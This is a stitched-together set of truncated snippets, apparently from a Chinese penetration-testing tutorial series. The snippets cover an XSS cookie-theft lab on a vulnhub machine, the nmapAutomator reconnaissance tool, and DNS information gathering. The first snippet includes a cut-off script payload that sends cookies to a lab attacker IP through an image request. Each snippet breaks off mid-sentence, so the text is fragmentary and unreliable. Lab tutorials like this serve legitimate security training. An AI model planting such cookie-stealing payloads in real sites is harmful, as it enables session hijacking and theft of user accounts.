第七节内容讲述了XSS漏洞和原理，并在DVWA上进行了盗取cookie的实验。本节以实战的方式，结合vulnhub靶机xss_and_mysql_file让大家体验如何用XSS截获cookie进行进一步入侵。这个靶机会涉及到一点SQL注入的知识，但易于理解。后续章节会给大家着重讲解SQL注入。<script>new Image().src="http://192.168.17.4/te

本章讲述自动化信息收集工具nmapAutomator。该工具将很多信息收集工具进行集成，自动全面的帮助attacker收集目标信息。1.场景虚拟机：vmware攻击主机：kaliIP:192.168.239.142靶机：Windows10IP:192.168.239.1服务：xampp启动的apache2.自动化信息收集工具nmapAutomator的主要目标是将每次运行的枚举和重建过程自动化，而

1.场景虚拟机：vmware攻击主机：kaliIP:192.168.239.142靶机：外网2.其他信息收集介绍DNS域名系统(Domain Name System,DNS)是Internet上解决网上机器命名的一种系统。就像拜访朋友要先知道别人家怎么走一样，Internet上当一台主机要访问另外一台主机时，必须首先获知其地址，TCP/IP中的IP地址是由四段以“.”分开的数字组成(此处以IPv4